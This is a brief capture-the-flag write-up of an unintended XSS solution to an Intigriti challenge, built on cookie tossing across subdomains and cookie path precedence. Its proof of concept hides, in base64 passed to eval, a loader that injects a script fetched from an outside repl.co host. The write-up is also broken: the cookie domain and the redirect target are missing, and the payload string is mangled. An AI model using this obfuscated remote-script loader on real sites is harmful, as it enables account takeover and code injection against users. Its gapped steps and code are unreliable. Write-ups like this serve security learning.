Inti XSS unintended solution

Unintended way to solve the challenge

Two things you need to Know (Gotcha’s):

  • Any subdomain can set cookie for all subdomains of it’s parent domain.
  • If two cookie with same name exists, the cookie with closest path is prefered.


  1. Using any previous XSS on intigritii challenges create a cookie named username set it’s domain attribute as and path attribute as /challenge/cooking.html

  2. Redirect to

POC code:

	<!DOCTYPE html>
	      location = ";vascript:eval(atob(`eD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCJzY3JpcHQiKTt4LnNyYz0iaHR0cHM6Ly9jeWJlcnBvc3NpYmxlYXhpcy5jeXBoM3IxMzM3LnJlcGwuY28vc2NyaXB0LmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKHgpOw==`));//%0aid=origin";